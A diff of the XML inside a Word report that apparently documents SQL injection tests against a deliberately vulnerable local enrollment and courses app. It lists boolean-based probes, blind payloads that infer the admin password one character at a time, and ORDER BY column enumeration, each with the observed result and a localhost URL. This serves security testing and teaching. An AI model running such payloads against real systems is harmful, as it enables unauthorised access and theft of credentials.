+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Enrollment found</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:03.188Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/vulnerable/enrollment?reference=ENR-2026-001%27+AND+1%3D1+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2799,7 +3025,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="748D6C7E">
+        <w:pict w14:anchorId="01A6D2F8">
           <v:shape id="_x0000_i1034" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId13" o:title=""/>
           </v:shape>
@@ -2828,7 +3054,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 14 of 41</w:t>
+        <w:t>Page 15 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2864,104 +3090,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Intermediate Infer A</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='A' -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Enrollment found</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:37.073Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target endpoint: http://localhost:8000/vulnerable/enrollment. Exact encoded URL is in verification.json.</w:t>
+        <w:t>Vulnerable Version Sql Injection Intermediate False</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND 1=2 -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: No matching enrollment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:03.759Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/vulnerable/enrollment?reference=ENR-2026-001%27+AND+1%3D2+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2986,7 +3211,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="70882684">
+        <w:pict w14:anchorId="77F82D1C">
           <v:shape id="_x0000_i1035" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId14" o:title=""/>
           </v:shape>
@@ -3015,7 +3240,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 15 of 41</w:t>
+        <w:t>Page 16 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3051,80 +3276,79 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Intermediate Infer Z</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='Z' -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: No matching enrollment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:37.577Z. The screenshot footer displays PKT.</w:t>
+        <w:t>Vulnerable Version Sql Injection Intermediate Infer A</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='A' -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Enrollment found</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:04.364Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3173,7 +3397,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="323A82D3">
+        <w:pict w14:anchorId="06E79425">
           <v:shape id="_x0000_i1036" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId15" o:title=""/>
           </v:shape>
@@ -3202,7 +3426,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 16 of 41</w:t>
+        <w:t>Page 17 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3238,104 +3462,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Advanced Columns Three</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' ORDER BY 3 -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Observed database response: Information Security</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:38.074Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+ORDER+BY+3+--+</w:t>
+        <w:t>Vulnerable Version Sql Injection Intermediate Infer Z</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='Z' -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: No matching enrollment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:04.984Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target endpoint: http://localhost:8000/vulnerable/enrollment. Exact encoded URL is in verification.json.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3360,7 +3583,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="09B9AFA6">
+        <w:pict w14:anchorId="7D2B0FF4">
           <v:shape id="_x0000_i1037" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId16" o:title=""/>
           </v:shape>
@@ -3389,7 +3612,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 17 of 41</w:t>
+        <w:t>Page 18 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3425,104 +3648,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Advanced Columns Four</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' ORDER BY 4 -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Observed database response: ORDER BY</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:38.570Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/vulnerable/courses?q=%27+ORDER+BY+4+--+</w:t>
+        <w:t>Vulnerable Version Sql Injection Advanced Columns Three</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
